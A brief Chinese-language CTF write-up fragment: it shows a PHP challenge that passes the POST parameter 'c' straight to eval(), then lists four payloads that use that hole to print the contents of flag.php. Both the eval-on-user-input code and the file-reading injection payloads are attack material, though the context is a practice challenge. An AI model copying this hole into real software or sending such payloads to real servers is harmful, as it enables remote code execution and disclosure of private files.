1. 代码审计 

      1. <?php
      2. // 你们在炫技吗?
      3. if(isset($_POST['c'])){
      4.     $c= $_POST['c'];
      5.     eval($c);
      6. }else{
      7. highlight_file(__FILE__);
      8. }

    2. 同理,测试可以用的payload 

      1. c=show_source("flag.php");
      2. c=highlight_file("flag.php");
      3. c=require('flag.php');echo $flag;
      4. c=print_r(php_strip_whitespace("flag.php"));